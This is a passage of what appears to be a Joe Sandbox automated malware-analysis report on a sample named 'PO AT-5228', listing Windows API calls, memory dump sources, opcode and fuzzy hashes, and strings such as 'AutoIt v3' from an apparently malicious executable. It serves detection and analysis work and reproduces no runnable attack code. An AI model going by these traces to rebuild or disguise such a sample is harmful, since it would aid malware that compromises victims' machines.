                                                                                        • Opcode ID: 5d453fef3494f49c51e92478e4beaa2cb12060318fed219a14b35d7d4a398e98
                                                                                        • Instruction ID: 81b13459b0360fa2ca66b72db87d988cc6fb8ac70c29c06e677fdc46dc2d1bfe
                                                                                        • Opcode Fuzzy Hash: 5d453fef3494f49c51e92478e4beaa2cb12060318fed219a14b35d7d4a398e98
                                                                                        • Instruction Fuzzy Hash: C7D09EA56EC70579FD2907249C5FF7619C8F30A7C1F9491C9B582CA6C3BCD458469132
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B9AD3E), ref: 00B9B124
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        • Opcode ID: 94beaf83e03836ff75f2e877be9fc514bec272abc2f524ef677863c59d85c72c
                                                                                        • Instruction ID: 98478a67ff078f2d5da852e8661f988c64d0df246348304aa2533695cd3046a7
                                                                                        • Opcode Fuzzy Hash: 94beaf83e03836ff75f2e877be9fc514bec272abc2f524ef677863c59d85c72c
                                                                                        • Instruction Fuzzy Hash: 62D09E321A464EAEDF025FA4DC06EAE3F6AEB04701F448511FA25DA4A1C675D531AB50
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: 4af125bace4d8327b566c72320003e421f87ddaa86557ec3979a7ce5657e956e
                                                                                        • Instruction ID: 3c936e965291d19cf5f7bd2e0a0d88d638e5a13734318eab836cd539a842f4ba
                                                                                        • Opcode Fuzzy Hash: 4af125bace4d8327b566c72320003e421f87ddaa86557ec3979a7ce5657e956e
                                                                                        • Instruction Fuzzy Hash: 95C04CB1400159DFC751CBC0CD849EEB7BCAB04301F1440929105F2110DB709B459B72
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B8818F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 842cdc8b21f1ea1277a42e3a38b91e3f7c520cd5bbff25d82d2b7a497e9ac567
                                                                                        • Instruction ID: cab4225cde725f14d1c9e79cd9e2d163a748c9998fd21db4d24f2910770f59da
                                                                                        • Opcode Fuzzy Hash: 842cdc8b21f1ea1277a42e3a38b91e3f7c520cd5bbff25d82d2b7a497e9ac567
                                                                                        • Instruction Fuzzy Hash: 17A0223200020CFBCF002F82FC088883F2CFB002A0B000020F80C0A030CFB3A8208ACA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 469789659c6734425f8084be37ce56aed331c49b9a77353e004290f1dc352ffb
                                                                                        • Instruction ID: 85ff1f3a6102204090a52e4e34e61bcf91c302189ed9fc9bf88209cb57dffc09
                                                                                        • Opcode Fuzzy Hash: 469789659c6734425f8084be37ce56aed331c49b9a77353e004290f1dc352ffb
                                                                                        • Instruction Fuzzy Hash: 88229E789042068FDB24DF58C490ABEB7F1FF14304F1481AAE96A9B351E739ED45CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0fd3d0c89f51fb2222995899da7ccb705b36d9d7de2f8c857b58da29d6f029b7
                                                                                        • Instruction ID: 40ba239f6cb8f58776bee63a428b93b5439d343e38e7606e16e5006878c776e2
                                                                                        • Opcode Fuzzy Hash: 0fd3d0c89f51fb2222995899da7ccb705b36d9d7de2f8c857b58da29d6f029b7
                                                                                        • Instruction Fuzzy Hash: F0126A70A002099FDF14DFA5D981AAEF7F9FF58300F1085A9E816E7254EB3AAD11CB54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3728558374-0
                                                                                        • Opcode ID: 6bc0ebd81621fb4d52c1b68e3ef522dcff5f3a97c1f3c42423631863e08358eb
                                                                                        • Instruction ID: 2f017be0d4d0fda315eb8b2f4a44602674761139a513ee6bd8ac6f5aba0642a8
                                                                                        • Opcode Fuzzy Hash: 6bc0ebd81621fb4d52c1b68e3ef522dcff5f3a97c1f3c42423631863e08358eb
                                                                                        • Instruction Fuzzy Hash: 21029070A00205DBCF04DF64D991AAEBBF5EF49300F14C4AAE80AEB355EB35DA55CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                        • Instruction ID: a8a79c998e4ec539f704edfbb13b26db5195fbdf1963d82ed6c59dc166337b46
                                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                        • Instruction Fuzzy Hash: 43C1B0322151930ADB6D5639C47443EBAE19BA27F131A07FDD8B7CB5E5EE20C528D720
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                        • Instruction ID: d84918b37a205c0b65d179cf3d587474db9251a3e2c958bab6ca462ae1a363bd
                                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                        • Instruction Fuzzy Hash: ADC1A03621519309DBAD5639C47443EBAE19BA2BB131A07BDD4B7CB4E5EE20C928D720
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                        • Instruction ID: 486069a6eea3f0b012d53a42780287c114a009cb7aa267ee3ac3410e33b34f27
                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                        • Instruction Fuzzy Hash: 2DC16E3220909309DF2D4679C47443EBAE1DBA2BB131A87FDD8BBCB5D5EE20C564D624
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                        • Instruction ID: 44da354b641c4dd15407e98e7aaaf9754963b57472909ce4c087bf22fe35cc7d
                                                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                        • Instruction Fuzzy Hash: BA41D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                        • Instruction ID: 741777ec52ec0957861fc57de2fdd8e724d7f8ca9ca913d4cffb29b80c2083c9
                                                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                        • Instruction Fuzzy Hash: 64019278A00209EFCB44DFA8C5909AEF7B9FB48310F248699E809A7341D730AE41DB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                        • Instruction ID: 58ba826e4274420fdfbf357484c4d6783312d96c67e5ae03d08f66ea6f95f442
                                                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                        • Instruction Fuzzy Hash: F2019278A00109EFCB44DFA8C5909AEF7B9FB48310F248599E809A7301D730AE41DB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BBA2FE
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BBA310
                                                                                        • DestroyWindow.USER32 ref: 00BBA31E
                                                                                        • GetDesktopWindow.USER32 ref: 00BBA338
                                                                                        • GetWindowRect.USER32(00000000), ref: 00BBA33F
                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00BBA480
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00BBA490
                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA4D8
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00BBA4E4
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BBA51E
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA540
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA553
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA55E
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00BBA567
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA576
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00BBA57F
                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA586
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00BBA591
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA5A3
                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BED9BC,00000000), ref: 00BBA5B9
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00BBA5C9
                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00BBA5EF
                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00BBA60E
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA630
                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA81D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 2211948467-2373415609
                                                                                        • Opcode ID: a1361ff11f3ca4c46567492b462e7e49fd18c1053c2029d7a706ee90334f9370
                                                                                        • Instruction ID: 82abef134c002520e0fa276fbc85bf44c792785265adaa3a419b68f84318b415
                                                                                        • Opcode Fuzzy Hash: a1361ff11f3ca4c46567492b462e7e49fd18c1053c2029d7a706ee90334f9370
                                                                                        • Instruction Fuzzy Hash: 39026D75A10254EFDB14DFA4CD89EAE7BF9EB48310F048198F905AB2A0CBB4DD41CB61
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00BCD2DB
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00BCD30C
                                                                                        • GetSysColor.USER32(0000000F), ref: 00BCD318
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00BCD332
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00BCD341
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00BCD36C
                                                                                        • GetSysColor.USER32(00000010), ref: 00BCD374
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00BCD37B
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00BCD38A
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BCD391
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00BCD3DC
                                                                                        • FillRect.USER32(?,?,00000000), ref: 00BCD40E
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BCD439
                                                                                          • Part of subcall function 00BCD575: GetSysColor.USER32(00000012), ref: 00BCD5AE
                                                                                          • Part of subcall function 00BCD575: SetTextColor.GDI32(?,?), ref: 00BCD5B2
                                                                                          • Part of subcall function 00BCD575: GetSysColorBrush.USER32(0000000F), ref: 00BCD5C8
                                                                                          • Part of subcall function 00BCD575: GetSysColor.USER32(0000000F), ref: 00BCD5D3
                                                                                          • Part of subcall function 00BCD575: GetSysColor.USER32(00000011), ref: 00BCD5F0
                                                                                          • Part of subcall function 00BCD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BCD5FE
                                                                                          • Part of subcall function 00BCD575: SelectObject.GDI32(?,00000000), ref: 00BCD60F
                                                                                          • Part of subcall function 00BCD575: SetBkColor.GDI32(?,00000000), ref: 00BCD618
                                                                                          • Part of subcall function 00BCD575: SelectObject.GDI32(?,?), ref: 00BCD625
                                                                                          • Part of subcall function 00BCD575: InflateRect.USER32(?,000000FF,000000FF), ref: 00BCD644
                                                                                          • Part of subcall function 00BCD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BCD65B
                                                                                          • Part of subcall function 00BCD575: GetWindowLongW.USER32(00000000,000000F0), ref: 00BCD670
                                                                                          • Part of subcall function 00BCD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BCD698
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 3521893082-0
                                                                                        • Opcode ID: e829eed956bd9cdb6ea9ad41639cba14afc417c20be9fa15edca98f933f24d96
                                                                                        • Instruction ID: 1113c15764c0a9f655d0f2ce1dc0ce4bb00fcaf0ce32dbc256300623a4ec2af7
                                                                                        • Opcode Fuzzy Hash: e829eed956bd9cdb6ea9ad41639cba14afc417c20be9fa15edca98f933f24d96
                                                                                        • Instruction Fuzzy Hash: 97916E71408341AFD7109F64DC88E6B7BE9FF85325F100A2DF9669B1A0DBB1D944CB52
                                                                                        APIs
                                                                                        • DestroyWindow.USER32 ref: 00B7B98B
                                                                                        • DeleteObject.GDI32(00000000), ref: 00B7B9CD
                                                                                        • DeleteObject.GDI32(00000000), ref: 00B7B9D8
                                                                                        • DestroyIcon.USER32(00000000), ref: 00B7B9E3
                                                                                        • DestroyWindow.USER32(00000000), ref: 00B7B9EE
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00BDD2AA
                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BDD2E3
                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00BDD711
                                                                                          • Part of subcall function 00B7B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B7B759,?,00000000,?,?,?,?,00B7B72B,00000000,?), ref: 00B7BA58
                                                                                        • SendMessageW.USER32 ref: 00BDD758
                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BDD76F
                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00BDD785
                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00BDD790
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                        • String ID: 0
                                                                                        • API String ID: 464785882-4108050209
                                                                                        • Opcode ID: 3fdf22ee2bc41cff5196d69c33c3191e24dca5282c489ae92b5f49db4707a8e6
                                                                                        • Instruction ID: cdfa524e7b20c88522b62313cfc93661767bbd96e333657b7c9a60bb75dccb30
                                                                                        • Opcode Fuzzy Hash: 3fdf22ee2bc41cff5196d69c33c3191e24dca5282c489ae92b5f49db4707a8e6
                                                                                        • Instruction Fuzzy Hash: 98128C30204241DFDB15CF24C884BA9BBE5FF55314F1485AAEAA9DB262DB31EC45CF91
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00BADBD6
                                                                                        • GetDriveTypeW.KERNEL32(?,00BFDC54,?,\\.\,00BFDC00), ref: 00BADCC3
                                                                                        • SetErrorMode.KERNEL32(00000000,00BFDC54,?,\\.\,00BFDC00), ref: 00BADE29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
